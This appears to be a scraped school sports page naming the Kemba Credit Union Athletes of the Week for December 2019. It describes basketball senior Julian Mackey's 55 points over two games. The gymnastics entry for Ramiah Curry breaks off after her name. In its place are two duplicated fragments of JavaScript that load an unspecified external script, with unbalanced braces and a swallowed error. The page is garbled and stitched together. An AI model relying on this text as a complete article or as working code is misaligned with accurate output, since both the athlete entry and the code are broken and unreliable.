Athletes of the Week
Kemba Credit Union Athletes of the Week 12/9/2019-12/15/2019
Julian Mackey
Senior, Boys Basketball
Julian scored a team high 55 points in Lakota West league wins over Princeton and Middletown this week. He started the week with a 27 point/10 rebound double-double versus the Vikings on Tuesday and followed that with 28 points in Friday’s win over the Middies (74-64). He made 24 of 26 free throws attempted (92.3%) in these two games combined.
Ramiah Curry
Junior, Gymnastics
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();